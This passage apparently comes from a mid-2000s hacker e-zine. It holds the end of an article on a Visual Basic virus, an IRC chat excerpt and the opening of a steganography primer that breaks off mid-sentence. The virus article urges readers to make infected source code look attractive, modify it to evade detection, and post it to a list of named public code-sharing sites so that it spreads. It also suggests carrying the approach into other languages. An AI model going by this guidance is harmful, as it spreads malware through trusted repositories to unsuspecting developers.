sound like your program is very good and anyone and everyone should be using it. Make people want to download it. STEP FOUR: There is no step four! And thats that! I recomend not to use the source code that has the virus already attached that is included in this program because it will be easily recognized. If you are any good at VB, feel free to modify this code to make it harder to spot. Change the markers. Switch the amount of sub functions it infects. Make it somewhat polymorphic and just basicly make it look differnt. Any of these will make the source look differnt and harder to spot from the original. I could have added a polymorph engine, but this would have significantly added to the size of the file. I think the smaller and tighter the code, the quicker it will spread from file to file and the harder it will be to spot. Here is a short list of sites that people download VB source from. Use these sites to post your bogus programs http://plantesourcecode.com http://www.freevbcode.com/ http://www.codeproject.com/ http://www.planet-source-code.com/ http://www.codearchive.com/ http://www.programmersheaven.com/ http://www.freeprogrammingresources.com/vbsource.html http://abstractvb.com/ http://www.vbcode.com/ http://www.developerfusion.co.uk/vb/ 8 - ___---=== Outros ===---___ This virus could be ported to VB.NET or VB 2003 or any other basic-type language. The consepts in this article can be applyed to 90% of all programming languages and most scripting languages as well, including Delphi, C, C++, ASM just to name a few. All you really have to do is pick a language you hate and apply these consepts to that language then post the source on the net. ~This t-file is dedicated to my insperation, Marijah-Wahna.~ -=If you ate ten pot browines before going to bed, you would write=- .,shit like this too!!,. -E0F- Tec|0n. You're only missing an 'h' and an 'e'. -:- port9 is now known as t4ku_pp3 ? oh lol never even noticed that lol * Te|c0n/#hackcanada is original Now I'm missing two 'o's. We win. lol phlux is missing his frontal lobe. What does he get for a prize? a medicare card? yay! ::::- K-1INE:XLIX::VI:VI:MMVI:AD::DCLXVI -:- K-1INE:49::06/06/2006:AD::666 -:::: The Basics of Steganography Before I start, I should mention that this isn't my original idea. I got it from malattia, and it wasn't even original to him. Regardless, it's fucking cool, and I think you'll enjoy it. Introduction: What's the difference between data and commands? For example, the string "print $message" and the command "print $message" look identical, but when interpreted by a computer they can do very different things. The former becomes a variable which can be manipulated by a program like any other string, and the latter becomes part of a script or program that can dire- ctly perform said manipulation. But they look the same! So where do we draw the line? The answer: there really isn't any line. This observation was realized by John von Neumann when he was collaborating on the ENIAC, one of the first electronic computer systems. In fact, a common attack of computer systems involves inserting dangerous code as a variable, and then tricking the computer into manipulating that variable so it becomes executable code. For example, in some scripts you can set a parameter "index?q=